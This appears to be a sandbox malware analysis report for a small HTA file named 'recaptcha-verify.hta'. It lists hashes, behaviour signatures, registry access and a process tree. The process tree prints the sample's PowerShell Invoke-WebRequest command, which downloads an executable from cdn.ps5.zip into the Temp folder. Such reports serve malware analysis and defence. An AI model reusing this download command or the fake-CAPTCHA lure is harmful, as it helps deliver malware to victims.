Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
15s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/01/2025, 17:07
Static task
static1
Behavioral task
behavioral1
Sample
recaptcha-verify.hta
Resource
win7-20240903-en
General
-
Target
recaptcha-verify.hta
-
Size
2KB
-
MD5
0b7e92d23c4b2765b641fa4236564270
-
SHA1
d1763d696b8e530c8f29026ba0f3278c77660f26
-
SHA256
19fb3108a5c7a3bc2694062805359f555450524a6fbf1eba7c30a544e1749f94
-
SHA512
5ac9164afbff95b0ecf3e782037983736a93017d10b7564239bae0b3002d5be18401102a05e1e031c75198e35b08463b1a729482ddffcd4144546092ef36fb13
Malware Config
Signatures
-
Blocklisted process makes network request 8 IoCs
flow pid Process 6 2316 mshta.exe 7 2316 mshta.exe 10 2316 mshta.exe 11 2316 mshta.exe 14 2316 mshta.exe 15 2316 mshta.exe 18 2316 mshta.exe 19 2316 mshta.exe -
pid Process 2728 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2728 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2728 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2316 wrote to memory of 2240 2316 mshta.exe 32 PID 2316 wrote to memory of 2240 2316 mshta.exe 32 PID 2316 wrote to memory of 2240 2316 mshta.exe 32 PID 2316 wrote to memory of 2240 2316 mshta.exe 32 PID 2240 wrote to memory of 2728 2240 cmd.exe 34 PID 2240 wrote to memory of 2728 2240 cmd.exe 34 PID 2240 wrote to memory of 2728 2240 cmd.exe 34 PID 2240 wrote to memory of 2728 2240 cmd.exe 34
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\recaptcha-verify.hta"1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -Uri 'https://cdn.ps5.zip/steam.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://cdn.ps5.zip/steam.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_file.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\favicon[1].ico
Filesize5KB
MD5f3418a443e7d841097c714d69ec4bcb8
SHA149263695f6b0cdd72f45cf1b775e660fdc36c606
SHA2566da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA51282d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563